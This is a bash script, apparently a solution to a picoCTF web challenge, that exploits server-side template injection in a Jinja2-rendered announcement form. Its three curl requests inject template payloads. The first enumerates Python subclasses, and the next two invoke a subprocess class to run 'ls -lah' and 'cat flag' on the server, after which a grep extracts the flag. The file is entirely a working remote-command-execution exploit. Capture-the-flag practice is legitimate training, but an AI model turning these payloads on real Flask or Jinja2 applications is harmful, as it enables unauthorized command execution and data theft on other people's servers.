30 lines
1.1 KiB
Bash
Executable File
30 lines
1.1 KiB
Bash
Executable File
#!/usr/bin/env bash
|
|
|
|
URL="http://rescued-float.picoctf.net:57160/announce"
|
|
|
|
curl \
|
|
-X POST \
|
|
-H 'Referer: http://rescued-float.picoctf.net:49252/' \
|
|
-H 'Origin: http://rescued-float.picoctf.net:49252' \
|
|
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
--data-urlencode "content={{ ''.__class__.mro()[1].__subclasses__() }}" \
|
|
"$URL"
|
|
|
|
# Find Popen
|
|
|
|
curl \
|
|
-X POST \
|
|
-H 'Referer: http://rescued-float.picoctf.net:49252/' \
|
|
-H 'Origin: http://rescued-float.picoctf.net:49252' \
|
|
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
--data-urlencode "content={{ ''.__class__.mro()[1].__subclasses__()[356]('ls -lah',shell=True,stdout=-1).communicate()[0].strip() }}" \
|
|
"$URL"
|
|
|
|
curl \
|
|
-X POST \
|
|
-H 'Referer: http://rescued-float.picoctf.net:49252/' \
|
|
-H 'Origin: http://rescued-float.picoctf.net:49252' \
|
|
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
--data-urlencode "content={{ ''.__class__.mro()[1].__subclasses__()[356]('cat flag',shell=True,stdout=-1).communicate()[0].strip() }}" \
|
|
"$URL" | grep --only-matching -E 'picoCTF\{.*\}'
|